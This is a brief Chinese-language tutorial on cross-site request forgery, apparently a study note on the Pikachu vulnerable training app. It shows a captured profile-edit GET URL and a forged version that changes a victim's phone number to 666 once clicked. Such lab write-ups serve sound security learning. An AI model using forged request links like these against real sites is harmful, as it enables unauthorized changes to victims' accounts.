CSRF—Cross-site request forgery—“one click”

在CSRF的攻击场景中攻击者会伪造一个请求（一般为链接），然后欺骗目标用户进行攻击，用户一旦点击了这个请求，整个攻击就完成了。

---

案例：通过CSRF进行地址修改

一.使用一个账号修改用户信息，并通过Burp Suite进行抓包，获得修改信息请求时的URL:
http://192.168.2.90/pikachu/vul/csrf/csrfget/csrf_get_edit.php?sex=girl&phonenum=12345678922&add=333&email=lucy%40pikachu.com&submit=submit

二.比如攻击者需要将目标用户的电话号码修改为666，则让对方打开：
http://192.168.2.90/pikachu/vul/csrf/csrfget/csrf_get_edit.php?sex=girl&phonenum=666&add=333&email=lucy%40pikachu.com&submit=submit

三.对方打开该网站时修改已成功